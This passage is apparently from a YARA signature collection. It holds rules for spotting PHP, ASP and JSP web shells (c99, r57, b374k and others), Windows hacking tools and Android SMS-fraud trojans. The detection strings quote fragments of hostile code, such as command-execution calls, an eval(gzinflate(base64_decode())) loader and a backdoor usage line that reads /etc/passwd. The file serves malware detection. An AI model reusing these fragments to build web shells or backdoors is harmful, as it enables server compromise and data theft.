        $chr_builder = "(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU"
    condition:
        $chr_builder
}
rule WebShell_php_webshells_MyShell {
    // MyShell.php: error page title, config defaults, comments and the
    // system() call that captures output via /tmp/output.txt.
    // Three of eight required.
    meta:
        description = "PHP Webshells Github Archive - file MyShell.php"
        author = "Florian Roth"
        hash = "42e283c594c4d061f80a18f5ade0717d3fb2f76d"
    strings:
        $m1 = "<title>MyShell error - Access Denied</title>" fullword
        $m2 = "$adminEmail = \"youremail@yourserver.com\";" fullword
        $m3 = "//A workdir has been asked for - we chdir to that dir." fullword
        // command execution with output redirected through /tmp/output.txt
        $m4 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
        $m5 = "#$autoErrorTrap Enable automatic error traping if command returns error." fullword
        $m6 = "/* No work_dir - we chdir to $DOCUMENT_ROOT */" fullword
        $m7 = "#every command you excecute." fullword
        $m8 = "<form name=\"shell\" method=\"post\">" fullword
    condition:
        3 of ($m*)
}
rule webshell_php_404 {
    // 404.php: triple-MD5 password derivation line. Single string.
    meta:
        description = "Web Shell - file 404.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "ced050df5ca42064056a7ad610a191b3"
    strings:
        $triple_md5 = "$pass = md5(md5(md5($pass)));" fullword
    condition:
        $triple_md5
}
rule webshell_drag_system {
    // system.jsp: Oracle DBA_TABLES enumeration query used by the shell's
    // database browser. Single string.
    meta:
        description = "Web Shell - file system.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "15ae237cf395fb24cf12bff141fb3f7c"
    strings:
        $dba_tables = "String sql = \"SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_"
    condition:
        $dba_tables
}
rule phpbackdoor15_php {
    // phpbackdoor15 (French-language PHP shell): upload confirmation,
    // the move_uploaded_file() call and the file-list hint. Any one fires.
    meta:
        description = "Semi-Auto-generated  - file phpbackdoor15.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "0fdb401a49fc2e481e3dfd697078334b"
    strings:
        $msg_uploaded = "echo \"fichier telecharge dans \".good_link(\"./\".$_FILES[\"fic\"][\"na"
        $move_upload  = "if(move_uploaded_file($_FILES[\"fic\"][\"tmp_name\"],good_link(\"./\".$_FI"
        $msg_hint     = "echo \"Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s"
    condition:
        any of them
}
rule webshell_ASP_RemExp {
    // RemExp.asp remote explorer: folder-listing cell and its
    // ConvertBinary helper. Both required.
    meta:
        description = "Web Shell - file RemExp.asp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "aa1d8491f4e2894dbdb91eec1abc2244"
    strings:
        $folder_cell = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Reques"
        $conv_binary = "Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal"
    condition:
        $folder_cell and $conv_binary
}
rule by064cli {
    // by064cli.exe client: redirect notice and the password prompt that
    // reveals the default password 'by'. Both required.
    meta:
        description = "Webshells Auto-generated - file by064cli.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "10e0dff366968b770ae929505d2a9885"
    strings:
        $msg_redirect = "packet dropped,redirecting"
        $msg_password = "input the password(the default one is 'by')"
    condition:
        $msg_redirect and $msg_password
}
rule WebShell_php_webshells_matamu {
    // matamu.php: comments and command-building lines of its phpshell-like
    // cd handling and output capture. Two of six required.
    meta:
        description = "PHP Webshells Github Archive - file matamu.php"
        author = "Florian Roth"
        hash = "d477aae6bd2f288b578dbf05c1c46b3aaa474733"
    strings:
        $cmd_flag     = "$command .= ' -F';" fullword
        $cmt_cd       = "/* We try and match a cd command. */" fullword
        $cmt_trust    = "directory... Trust me - it works :-) */" fullword
        $cmd_redirect = "$command .= \" 1> $tmpfile 2>&1; \" ." fullword
        $cd_newdir    = "$new_dir = $regs[1]; // 'cd /something/...'" fullword
        $cmt_lastdir  = "/* The last / in work_dir were the first charecter." fullword
    condition:
        2 of ($cmd*, $cmt*, $cd_newdir)
}
rule SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php {
    // SimAttacker 1.0.0: version banner, log-file welcome line and the
    // file-manager edit link. Any one fires.
    meta:
        description = "Semi-Auto-generated  - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "089ff24d978aeff2b4b2869f0c7d38a3"
    strings:
        $banner    = "SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend"
        $log_line  = " fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
        $edit_link = "echo \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora"
    condition:
        any of them
}
rule WebShell_Generic_PHP_10 {
    // Cyber Shell / PHPRemoteView: permission-string rendering code
    // (mode bits to rwx/T/t) plus one CSS line. All six required; the
    // permission code is the real signal, the CSS line is weak filler.
    meta:
        description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php, PHPRemoteView.php"
        author = "Florian Roth"
        super_rule = 1
        hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
        hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
        hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
        hash3 = "7d5b54c7cab6b82fb7d131d7bbb989fd53cb1b57"
    strings:
        // mode-bit to permission-letter conversion
        $perm_sticky = "$world[\"execute\"] = ($world['execute']=='x') ? 't' : 'T'; " fullword
        $perm_owner  = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; " fullword
        $perm_world  = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; " fullword
        $perm_type   = "else if( $mode & 0xA000 ) " fullword
        $perm_fmt    = "$s=sprintf(\"%1s\", $type); " fullword
        // layout
        $css_font    = "font-size: 8pt;" fullword
    condition:
        all of ($perm*) and $css_font
}
rule rknt_zip_Folder_RkNT {
    // RkNT.dll, UPX-packed build. Besides two real imports and the UPX
    // banner, the strings are fragments of the compressed body, so the rule
    // is tied to this exact packed build and will not survive repacking.
    // All seven required.
    meta:
        description = "Webshells Auto-generated - file RkNT.dll"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "5f97386dfde148942b7584aeb6512b85"
    strings:
        // surviving import names / format string
        $imp_strip   = "PathStripPathA"
        $imp_imgdir  = "ImageDirectoryEntryToData"
        $fmt_cproc   = "CreateProcessW: %S"
        // UPX banner
        $upx_banner  = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
        // compressed-body fragments specific to this build
        $body1 = "`cLGet!Addr%"
        $body2 = "oQToOemBuff* <="
        $body3 = "ionCdunAsw[Us'"
    condition:
        all of them
}
rule binder2_binder2 {
    // binder2.exe: two import names, a \syslog.en path fragment and three
    // fragments that look like compressed/garbled body bytes, so the rule
    // is build-specific. All six required.
    meta:
        description = "Webshells Auto-generated - file binder2.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "d594e90ad23ae0bc0b65b59189c12f11"
    strings:
        $imp_alnum = "IsCharAlphaNumericA"
        $imp_w2m   = "WideCharToM"
        $path_log  = "\\syslog.en"
        $body1     = "g 5pur+virtu!"
        $body2     = "heap7'7oqk?not="
        $body3     = "- Kablto in"
    condition:
        all of them
}
rule u_uay {
    // uay.exe: launches freecell.exe via an exec string, and references the
    // Security subkey of its own uay.sys service. Either one fires.
    meta:
        description = "Webshells Auto-generated - file uay.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "abbc7b31a24475e4c5d82fc4c2b8c7c4"
    strings:
        $exec_freecell = "exec \"c:\\WINDOWS\\System32\\freecell.exe"
        $svc_key       = "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"
    condition:
        any of them
}
rule webshell_Mysql_interface_v1_0 {
    // "Mysql interface v1.0": dropDB action link with confirm handler.
    // Single string.
    meta:
        description = "Web Shell - file Mysql interface v1.0.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "a12fc0a3d31e2f89727b9678148cd487"
    strings:
        $drop_link = "echo \"<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\\\"return"
    condition:
        $drop_link
}
rule phvayvv_php_php {
    // PHVayv 1.0 (Turkish-language PHP shell): mkdir with mode 777, the file
    // save fopen, and the version banner. Any one fires.
    meta:
        description = "Semi-Auto-generated  - file phvayvv.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "35fb37f3c806718545d97c6559abd262"
    strings:
        $mkdir_777 = "{mkdir(\"$dizin/$duzenx2\",777)"
        $save_open = "$baglan=fopen($duzkaydet,'w');"
        $banner    = "PHVayv 1.0"
    condition:
        any of them
}
rule WebShell_b374k_mini_shell_php_php {
    // b374k mini shell loader. All three lines are required, but none is
    // b374k-specific: error suppression, unlimited runtime and
    // eval(gzinflate(base64_decode($code))) form a generic packed-PHP
    // loader, so other packed payloads will match as well.
    meta:
        description = "PHP Webshells Github Archive - file b374k-mini-shell-php.php.php"
        author = "Florian Roth"
        hash = "afb88635fbdd9ebe86b650cc220d3012a8c35143"
    strings:
        $no_errors = "@error_reporting(0);" fullword
        $no_limit  = "@set_time_limit(0); " fullword
        $loader    = "@eval(gzinflate(base64_decode($code)));" fullword
    condition:
        $no_errors and $no_limit and $loader
}
// Semi-auto-generated rule for telnet.pl; both strings required.
rule telnet_pl
{
    meta:
        description = "Semi-Auto-generated  - file telnet.pl.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "dd9dba14383064e219e29396e242c1ec"
    strings:
        $s0 = "W A R N I N G: Private Server"
        $s2 = "$Message = q$<pre><font color=\"#669999\"> _____  _____  _____          _____   "
    condition:
        $s0 and $s2
}
// Single-string rule for usr.php (FeliksPack3); the string is the generator's
// truncated prefix of the script's opening array literal.
rule FeliksPack3___PHP_Shells_usr
{
    meta:
        description = "Webshells Auto-generated - file usr.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "ade3357520325af50c9098dc8a21a024"
    strings:
        $s0 = "<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor"
    condition:
        $s0
}
// Super rule covering four c99 shell variants (hash0-hash3); either string fires it.
rule webshell_c99_c99shell_c99_c99shell
{
    meta:
        description = "Web Shell - from files c99.php, c99shell.php, c99.php, c99shell.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
        hash1 = "d3f38a6dc54a73d304932d9227a739ec"
        hash2 = "157b4ac3c7ba3a36e546e81e9279eab5"
        hash3 = "048ccc01b873b40d57ce25a4c56ea717"
    strings:
        $s2 = "$bindport_pass = \"c99\";" fullword
        $s5 = " else {echo \"<b>Execution PHP-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr"
    condition:
        any of them
}
// Semi-auto-generated rule for kacak.asp; any one of the four strings is enough.
rule kacak_asp
{
    meta:
        description = "Semi-Auto-generated  - file kacak.asp.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "907d95d46785db21331a0324972dda8c"
    strings:
        $s0 = "Kacak FSO 1.0"
        $s1 = "if request.querystring(\"TGH\") = \"1\" then"
        $s3 = "<font color=\"#858585\">BuqX</font></a></font><font face=\"Verdana\" style="
        $s4 = "mailto:BuqX@hotmail.com"
    condition:
        any of them
}
// safe0ver.php: at least three of the seven fullword strings must match.
rule WebShell_safe0ver
{
    meta:
        description = "PHP Webshells Github Archive - file safe0ver.php"
        author = "Florian Roth"
        hash = "366639526d92bd38ff7218b8539ac0f154190eb8"
    strings:
        $s3  = "$scriptident = \"$scriptTitle By Evilc0der.com\";" fullword
        $s4  = "while (file_exists(\"$lastdir/newfile$i.txt\"))" fullword
        $s5  = "else { /* <!-- Then it must be a File... --> */" fullword
        $s7  = "$contents .= htmlentities( $line ) ;" fullword
        $s8  = "<br><p><br>Safe Mode ByPAss<p><form method=\"POST\">" fullword
        $s14 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
        $s20 = "/* <!-- End of Actions --> */" fullword
    condition:
        3 of them
}
// Single-string rule for DarkSpy105.exe, keyed on its exception message.
rule DarkSpy105
{
    meta:
        description = "Webshells Auto-generated - file DarkSpy105.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "f0b85e7bec90dba829a3ede1ab7d8722"
    strings:
        $s7 = "Sorry,DarkSpy got an unknown exception,please re-run it,thanks!"
    condition:
        $s7
}
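// Poison Sh3ll webshell. The original meta listed each sample hash twice
// (hash1=hash2, hash3=hash4, ...); the five distinct hashes are kept as
// hash1..hash5. Matching behaviour is untouched: the single ascii fullword
// string must be present and the scanned file must be under 550KB.
rule Webshell_AcidPoison
{
    meta:
        description = "Detects Poison Sh3ll - Webshell"
        author = "Florian Roth"
        reference = "https://github.com/nikicat/web-malware-collection"
        date = "2016-01-11"
        score = 70
        hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
        hash2 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
        hash3 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
        hash4 = "be541cf880a8e389a0767b85f1686443f35b508d1975ee25e1ce3f08fa32cfb5"
        hash5 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
    strings:
        $s1 = "elseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }" fullword ascii
    condition:
        filesize < 550KB and all of them
}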
// Super rule over ten r57-family shells (hash0-hash9); all three "echo sr(...)"
// UI fragments must be present.
rule webshell_r57shell_r57shell127_SnIpEr_SA_Shell_EgY_SpIdEr_ShElL_V2_r57_xxx
{
    meta:
        description = "Web Shell - from files r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "ef43fef943e9df90ddb6257950b3538f"
        hash1 = "ae025c886fbe7f9ed159f49593674832"
        hash2 = "911195a9b7c010f61b66439d9048f400"
        hash3 = "697dae78c040150daff7db751fc0c03c"
        hash4 = "513b7be8bd0595c377283a7c87b44b2e"
        hash5 = "1d912c55b96e2efe8ca873d6040e3b30"
        hash6 = "e5b2131dd1db0dbdb43b53c5ce99016a"
        hash7 = "4108f28a9792b50d95f95b9e5314fa1e"
        hash8 = "41af6fd253648885c7ad2ed524e0692d"
        hash9 = "6fcc283470465eed4870bcc3e2d7f14d"
    strings:
        $s2 = "echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_name"
        $s3 = "echo sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1"
        $s9 = "echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size="
    condition:
        $s2 and $s3 and $s9
}
// Dive Shell 1.0: any two of the four strings must match.
rule Dive_Shell_1_0___Emperor_Hacking_Team_php
{
    meta:
        description = "Semi-Auto-generated  - file Dive Shell 1.0 - Emperor Hacking Team.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "1b5102bdc41a7bc439eea8f0010310a5"
    strings:
        $s0 = "Emperor Hacking TEAM"
        $s1 = "Simshell" fullword
        $s2 = "ereg('^[[:blank:]]*cd[[:blank:]]"
        $s3 = "<form name=\"shell\" action=\"<?php echo $_SERVER['PHP_SELF'] ?>\" method=\"POST"
    condition:
        2 of them
}
// Super rule over three JSP shells (404.jsp, data.jsp, suiyue.jsp); one shared
// StringBuilder fragment is the sole indicator.
rule webshell_404_data_suiyue
{
    meta:
        description = "Web Shell - from files 404.jsp, data.jsp, suiyue.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "7066f4469c3ec20f4890535b5f299122"
        hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
        hash2 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
    strings:
        $s3 = " sbCopy.append(\"<input type=button name=goback value=' \"+strBack[languageNo]+"
    condition:
        $s3
}
// webshell-123.php: at least two of the four strings (one is the /e-modifier
// preg_replace trick with a hex-escaped "eval(gzinf..." payload).
rule webshell_webshell_123
{
    meta:
        description = "Web shells - generated from file webshell-123.php"
        author = "Florian Roth"
        date = "2014/03/28"
        score = 70
        hash = "2782bb170acaed3829ea9a04f0ac7218"
    strings:
        $s0 = "// Web Shell!!" fullword
        $s1 = "@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6"
        $s3 = "$default_charset = \"UTF-8\";" fullword
        $s4 = "// url:http://www.weigongkai.com/shell/" fullword
    condition:
        2 of them
}
// cmd-asp-5.1.asp: either WScript.Shell "win.com cmd.exe" invocation string fires the rule.
rule cmd_asp_5_1_asp
{
    meta:
        description = "Semi-Auto-generated  - file cmd-asp-5.1.asp.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "8baa99666bf3734cbdfdd10088e0cd9f"
    strings:
        $s0 = "Call oS.Run(\"win.com cmd.exe /c del \"& szTF,0,True)" fullword
        $s3 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
    condition:
        any of them
}
// 404.php: single-string rule on the posix_getpwuid / passwd UI label.
rule webshell_PHP_404
{
    meta:
        description = "Web Shell - file 404.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "078c55ac475ab9e028f94f879f548bca"
    strings:
        $s4 = "<span>Posix_getpwuid (\"Read\" /etc/passwd)"
    condition:
        $s4
}
// c99_locus7s.php: any two of the five strings (dump-file naming, sources URL,
// passwd paging constant) must match.
rule WebShell_c99_locus7s
{
    meta:
        description = "PHP Webshells Github Archive - file c99_locus7s.php"
        author = "Florian Roth"
        hash = "d413d4700daed07561c9f95e1468fb80238fbf3c"
    strings:
        $s8  = "$encoded = base64_encode(file_get_contents($d.$f)); " fullword
        $s9  = "$file = $tmpdir.\"dump_\".getenv(\"SERVER_NAME\").\"_\".$db.\"_\".date(\"d-m-Y"
        $s10 = "else {$tmp = htmlspecialchars(\"./dump_\".getenv(\"SERVER_NAME\").\"_\".$sq"
        $s11 = "$c99sh_sourcesurl = \"http://locus7s.com/\"; //Sources-server " fullword
        $s19 = "$nixpwdperpage = 100; // Get first N lines from /etc/passwd " fullword
    condition:
        2 of them
}
// JspWebshell 1.2: at least three of the six fullword strings (request parameter
// reads for password/editfile, GBK page directive, session password lookup).
rule WebShell_JspWebshell_1_2
{
    meta:
        description = "PHP Webshells Github Archive - file JspWebshell_1.2.php"
        author = "Florian Roth"
        hash = "0bed4a1966117dd872ac9e8dceceb54024a030fa"
    strings:
        $s0  = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
        $s1  = "String password=request.getParameter(\"password\");" fullword
        $s3  = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
        $s7  = "String editfile=request.getParameter(\"editfile\");" fullword
        $s8  = "//String tempfilename=request.getParameter(\"file\");" fullword
        $s12 = "password = (String)session.getAttribute(\"password\");" fullword
    condition:
        3 of them
}
// Super rule over CrystalShell v.1 / sosyete / stres; all seven strings are
// CSS/HTML layout fragments shared by the three files and every one must match.
rule WebShell__CrystalShell_v_1_sosyete_stres
{
    meta:
        description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, sosyete.php, stres.php"
        author = "Florian Roth"
        super_rule = 1
        hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
        hash1 = "e32405e776e87e45735c187c577d3a4f98a64059"
        hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
    strings:
        $s1  = "A:visited { COLOR:blue; TEXT-DECORATION: none}" fullword
        $s4  = "A:active {COLOR:blue; TEXT-DECORATION: none}" fullword
        $s11 = "scrollbar-darkshadow-color: #101842;" fullword
        $s15 = "<a bookmark=\"minipanel\">" fullword
        $s16 = "background-color: #EBEAEA;" fullword
        $s18 = "color: #D5ECF9;" fullword
        $s19 = "<center><TABLE style=\"BORDER-COLLAPSE: collapse\" height=1 cellSpacing=0 border"
    condition:
        all of them
}
// k8cmd.jsp: single fullword string, the session-attribute "hehe" auth check.
rule webshell_jsp_k8cmd
{
    meta:
        description = "Web Shell - file k8cmd.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "b39544415e692a567455ff033a97a682"
    strings:
        $s2 = "if(request.getSession().getAttribute(\"hehe\").toString().equals(\"hehe\"))" fullword
    condition:
        $s2
}
// webshell.php: both strings required.
rule webshell_php
{
    meta:
        description = "Semi-Auto-generated  - file webshell.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "e425241b928e992bde43dd65180a4894"
    strings:
        $s2 = "<die(\"Couldn't Read directory, Blocked!!!\");"
        $s3 = "PHP Web Shell"
    condition:
        $s2 and $s3
}
// simple_cmd.php (G-Security Webshell): any one of the four fullword strings fires.
rule WebShell_simple_cmd
{
    meta:
        description = "PHP Webshells Github Archive - file simple_cmd.php"
        author = "Florian Roth"
        hash = "466a8caf03cdebe07aa16ad490e54744f82e32c2"
    strings:
        $s1 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
        $s2 = "<title>G-Security Webshell</title>" fullword
        $s4 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
        $s6 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
    condition:
        any of them
}
// Laudanum injector (laudanum.php, WordPress plugin variant): both ascii fullword
// strings required and the file must be smaller than 5KB.
rule laudanum : webshell
{
    meta:
        description = "Laudanum Injector Tools - file laudanum.php"
        author = "Florian Roth"
        reference = "http://laudanum.inguardians.com/"
        date = "2015-06-22"
        hash = "fd498c8b195967db01f68776ff5e36a06c9dfbfe"
    strings:
        $s1 = "public function __activate()" fullword ascii
        $s2 = "register_activation_hook(__FILE__, array('WP_Laudanum', 'activate'));" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        filesize < 5KB and $s1 and $s2
}
// r57.1.4.0.php: all four fullword strings (error_log suppression, hard-coded
// password hash, ini_restore of disable_functions / safe_mode_exec_dir) must match.
rule webshell_r57_1_4_0
{
    meta:
        description = "Web Shell - file r57.1.4.0.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "574f3303e131242568b0caf3de42f325"
    strings:
        $s4 = "@ini_set('error_log',NULL);" fullword
        $s6 = "$pass='abcdef1234567890abcdef1234567890';" fullword
        $s7 = "@ini_restore(\"disable_functions\");" fullword
        $s9 = "@ini_restore(\"safe_mode_exec_dir\");" fullword
    condition:
        $s4 and $s6 and $s7 and $s9
}
// MySQL Web Interface 0.8: any two of the four strings must match.
rule MySQL_Web_Interface_Version_0_8_php
{
    meta:
        description = "Semi-Auto-generated  - file MySQL Web Interface Version 0.8.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "36d4f34d0a22080f47bb1cb94107c60f"
    strings:
        $s0 = "SooMin Kim"
        $s1 = "http://popeye.snu.ac.kr/~smkim/mysql"
        $s2 = "href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename"
        $s3 = "<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofi"
    condition:
        2 of them
}
// Simple PHP backdoor by DK: at least two of the five fullword strings.
rule WebShell_Simple_PHP_backdoor_by_DK
{
    meta:
        description = "PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php"
        author = "Florian Roth"
        hash = "03f6215548ed370bec0332199be7c4f68105274e"
    strings:
        $s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
        $s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
        $s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
        $s6 = "if(isset($_REQUEST['cmd'])){" fullword
        $s8 = "system($cmd);" fullword
    condition:
        2 of them
}
// admin-ad.asp: both strings (cmd input field, Response.write path/attrib link) required.
rule admin_ad
{
    meta:
        description = "Webshells Auto-generated - file admin-ad.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "e6819b8f8ff2f1073f7d46a0b192f43b"
    strings:
        $s6 = "<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" siz"
        $s7 = "Response.write\"<a href='\"&url&\"?path=\"&Request(\"oldpath\")&\"&attrib=\"&attrib&\"'><"
    condition:
        $s6 and $s7
}
// zehir4 ASP shell: either string fires the rule.
rule WebShell_webshells_zehir4
{
    meta:
        description = "Webshells Github Archive - file zehir4"
        author = "Florian Roth"
        hash = "788928ae87551f286d189e163e55410acbb90a64"
        score = 55
    strings:
        $s0 = "frames.byZehir.document.execCommand(command, false, option);" fullword
        $s8 = "response.Write \"<title>ZehirIV --> Powered By Zehir &lt;zehirhacker@hotmail.com"
    condition:
        any of them
}
// IXRbE.jsp: single-string rule on the one-line file-write scriptlet.
rule webshell_jsp_IXRbE
{
    meta:
        description = "Web Shell - file IXRbE.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "e26e7e0ebc6e7662e1123452a939e2cd"
    strings:
        $s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"
    condition:
        $s0
}
// https://otx.alienvault.com/pulse/5601b6c967db8c6fb351bbca
// Mapin Android trojan (payload, not the dropper - see dropperMapin): the GCM
// id, the device-admin XML path and the registration log string must all match.
rule Mapin : android
{
    meta:
        author = "https://twitter.com/plutec_net"
        source = "https://koodous.com/"
        reference = "http://www.welivesecurity.com/2015/09/22/android-trojan-drops-in-despite-googles-bouncer/"
        description = "Mapin trojan, not for droppers"
        sample = "7f208d0acee62712f3fa04b0c2744c671b3a49781959aaf6f72c2c6672d53776"
    strings:
        $a = "138675150963" // GCM id
        $b = "res/xml/device_admin.xml"
        $c = "Device registered: regId ="
    condition:
        $a and $b and $c
}
              
// Mapin dropper: both SDCard write log strings and "device_admin" must be present.
rule dropperMapin : android
{
    meta:
        author = "https://twitter.com/plutec_net"
        source = "https://koodous.com/"
        reference = "http://www.welivesecurity.com/2015/09/22/android-trojan-drops-in-despite-googles-bouncer/"
        description = "This rule detects mapin dropper files"
        sample = "7e97b234a5f169e41a2d6d35fadc786f26d35d7ca60ab646fff947a294138768"
        sample2 = "bfd13f624446a2ce8dec9006a16ae2737effbc4e79249fd3d8ea2dc1ec809f1a"
    strings:
        $a = ":Write APK file (from txt in assets) to SDCard sucessfully!"
        $b = "4Write APK (from Txt in assets) file to SDCard  Fail!"
        $c = "device_admin"
    condition:
        $a and $b and $c
}
// https://otx.alienvault.com/pulse/5977da8609721165b1362a3a
// RealShell dropper. NOTE(review): the original header was written
// "rule dropper:realshell android", which the YARA lexer reads as rule name
// "dropper" with tags "realshell" and "android"; spacing normalised here, the
// name and tags are unchanged.
rule dropper : realshell android
{
    meta:
        author = "https://twitter.com/plutec_net"
        reference = "https://koodous.com/"
        source = "https://blog.malwarebytes.org/mobile-2/2015/06/complex-method-of-obfuscation-found-in-dropper-realshell/"
    strings:
        $b = "Decrypt.malloc.memset.free.pluginSMS_encrypt.Java_com_skymobi_pay_common_util_LocalDataDecrpty_Encrypt.strcpy"
    condition:
        all of them
}
// https://otx.alienvault.com/pulse/5977d93c481b4c7935f5f811
// SMS fraud sample family (second variant): all five strings must match,
// including the native library path "lib/armeabi/libmylib.so".
rule smsfraud2 : android
{
    meta:
        author = "Antonio Snchez https://twitter.com/plutec_net"
        reference = "https://koodous.com/"
        sample = "0200a454f0de2574db0b58421ea83f0f340bc6e0b0a051fe943fdfc55fea305b"
        sample2 = "bff3881a8096398b2ded8717b6ce1b86a823e307c919916ab792a13f2f5333b6"
    strings:
        $a = "pluginSMS_decrypt"
        $b = "pluginSMS_encrypt"
        $c = "__dso_handle"
        $d = "lib/armeabi/libmylib.soUT"
        $e = "]Diok\"3|"
    condition:
        $a and $b and $c and $d and $e
}
// SMS fraud trojan (first variant): all three strings required.
rule smsfraud1 : android
{
    meta:
        author = "Antonio Snchez https://twitter.com/plutec_net"
        reference = "https://koodous.com/"
        description = "This rule detects a kind of SMSFraud trojan"
        sample = "265890c3765d9698091e347f5fcdcf1aba24c605613916820cc62011a5423df2"
        sample2 = "112b61c778d014088b89ace5e561eb75631a35b21c64254e32d506379afc344c"
    strings:
        $a = "E!QQAZXS"
        $b = "__exidx_end"
        $c = "res/layout/notify_apkinstall.xmlPK"
    condition:
        $a and $b and $c
}
              
// Generic SMS fraud rule (variant 2): all four strings required.
rule genericSMS2 : smsFraud android
{
    meta:
        author = "https://twitter.com/plutec_net"
        reference = "https://koodous.com/"
        sample = "1f23524e32c12c56be0c9a25c69ab7dc21501169c57f8d6a95c051397263cf9f"
        sample2 = "2cf073bd8de8aad6cc0d6ad5c98e1ba458bd0910b043a69a25aabdc2728ea2bd"
        sample3 = "20575a3e5e97bcfbf2c3c1d905d967e91a00d69758eb15588bdafacb4c854cba"
    strings:
        $a = "NotLeftTriangleEqual=022EC"
        $b = "SHA1-Digest: X27Zpw9c6eyXvEFuZfCL2LmumtI="
